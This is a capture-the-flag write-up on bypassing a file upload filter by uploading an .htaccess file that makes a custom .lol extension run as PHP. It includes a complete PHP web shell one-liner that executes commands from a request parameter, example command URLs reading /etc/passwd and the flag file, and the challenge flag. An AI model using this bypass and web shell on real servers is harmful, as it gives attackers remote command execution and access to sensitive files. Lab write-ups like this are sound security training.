Challenge Objective
The goal of this challenge is to exploit a file upload vulnerability to obtain the flag hosted on the server.
What is .htaccess?
.htaccess is a configuration file used by the Apache HTTP Server software. It allows for directory-level configuration changes, including URL rewriting, access control, and MIME type settings. In this challenge, we’ll use .htaccess to override the default handling of file extensions and enable execution of PHP code.
Proof of Concept (PoC)
In this challenge, PHP extensions are filtered, but .htaccess files are not. By uploading a .htaccess file, we can configure the server to execute files with custom extensions as PHP.
Exploit Strategy
Uploading .htaccess
Create an .htaccess file with the following content to map a custom file extension to PHP:
AddType application/x-httpd-php .lol
This configuration tells the server to treat files with the .lol extension as PHP scripts.
Uploading a Simple PHP One-Liner
Save the following PHP code as rce.lol. This script will serve as a simple backdoor allowing remote command execution:
<!-- Simple PHP Backdoor By DK (One-Liner Version) --> <!-- Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd --> <?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
By accessing the rce.lol file on the server, you can execute commands. For example: uploads/rce.lol?cmd=cat+../flag.txt
This URL will execute the cat ../flag.txt command on the server and display the contents of the flag file file.
Execution
Once the .htaccess and rce.lol files are uploaded, you can execute commands on the server using the rce.lol script by passing the desired command as a query parameter. This method allows you to interact with the server and potentially access sensitive files or data.
Flag
MetaCTF{g1v3s_m3_acce5s_4lr1ght}